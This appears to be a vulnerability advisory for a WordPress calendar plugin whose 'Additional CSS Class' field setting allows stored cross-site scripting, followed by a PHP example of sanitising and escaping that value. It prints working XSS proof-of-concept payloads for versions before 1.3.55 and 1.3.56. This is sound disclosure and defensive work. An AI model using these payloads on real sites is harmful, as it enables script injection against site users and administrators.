The plugin does not sanitise and escape a setting of its Calendar fields, which could allow high-privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
Proof of Concept
Create/edit a calendar, and put the following payload in the "Additional CSS Class" setting of a field:
v < 1.3.55: "><img src=x onerror=alert(/XSS/)><"
v < 1.3.56: backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)//, frontend: " style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//
The XSS will be triggered in the post/page where the Calendar is embedded, as well as when accessing the field settings when editing the calendar.
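The missing sanitise-on-save and escape-on-output steps for a CSS class setting, as an added example in plain PHP that is not the plugin's code. The function names and the `field` base class are hypothetical; inside WordPress, `sanitize_html_class()` and `esc_attr()` cover the same two steps.

```php
<?php
// Added example: hypothetical helpers, not taken from the plugin.

// Sanitise on save: keep only tokens that are plain CSS class names.
// Any token containing quotes, '=', '<', '>' or other markup is dropped.
function example_sanitize_css_classes(string $raw): string {
    $tokens = preg_split('/\s+/', trim($raw), -1, PREG_SPLIT_NO_EMPTY);
    $clean = [];
    foreach ($tokens as $token) {
        if (preg_match('/^-?[A-Za-z_][A-Za-z0-9_-]*$/', $token) === 1) {
            $clean[] = $token;
        }
    }
    return implode(' ', array_unique($clean));
}

// Escape on output: encode for an HTML attribute context and always
// quote the attribute, so a stored value cannot close it or add attributes.
function example_render_field(string $cssClass): string {
    $attr = htmlspecialchars($cssClass, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" class="field ' . $attr . '">';
}

// The first two values are the payloads quoted in this advisory;
// the third is a constructed benign setting.
$samples = [
    '"><img src=x onerror=alert(/XSS/)><"',
    '" style=animation-name:rotation onanimationstart=alert(/XSS/)//',
    'wide highlight',
];

foreach ($samples as $raw) {
    // Both layers applied: what should be stored and rendered.
    echo example_render_field(example_sanitize_css_classes($raw)), PHP_EOL;
    // Escaping alone: the raw value stays inside the quoted attribute.
    echo example_render_field($raw), PHP_EOL;
}
```

Applying both layers matters here because the setting is rendered in two places, the embedded calendar and the field settings screen, and each output site needs its own escaping.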